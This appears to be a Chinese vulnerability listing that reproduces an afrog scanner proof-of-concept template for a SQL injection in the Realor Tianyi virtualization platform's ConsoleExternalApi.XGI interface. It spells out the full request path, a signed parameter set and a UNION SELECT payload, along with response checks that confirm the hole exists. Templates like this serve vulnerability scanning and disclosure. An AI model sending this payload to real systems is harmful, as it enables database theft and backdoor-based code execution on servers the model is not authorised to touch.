realor-console-external-api-xgi-sqli: 瑞友天翼虚拟化平台ConsoleExternalApi.XGI接口SQL注入

日期: 2025-09-01 | 影响软件: 瑞友天翼虚拟化平台 | POC: 已公开

漏洞描述

天翼虚拟化平台ConsoleExternalApi.XGI接口存在SQL注入,攻击者可获取数据库敏感信息,写入后门文件实现rce。

PoC代码[已公开]

id: realor-console-external-api-xgi-sqli

info:
  name: 瑞友天翼虚拟化平台ConsoleExternalApi.XGI接口SQL注入
  author: clearx
  severity: high
  verified: true
  description: |
    天翼虚拟化平台ConsoleExternalApi.XGI接口存在SQL注入,攻击者可获取数据库敏感信息,写入后门文件实现rce。
  reference:
    - https://mp.weixin.qq.com/s/XFEqd3YdeQGY9Si08Rv1yg
    - https://mp.weixin.qq.com/s/vGzEkgiEx-4Ojrhm5REtfQ

set:
  sqlinject-poc: "1+union+select+1,2,3,4,5,user()%23"

rules:
  r0:
    request:
      method: GET
      path: /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart={{sqlinject-poc}}
    expression: response.status == 200 &&
      response.body.bcontains(b'iTotalRecords') &&
      response.body.bcontains(b'iTotalDisplayRecords')

expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/realor-console-external-api-xgi-sqli.yaml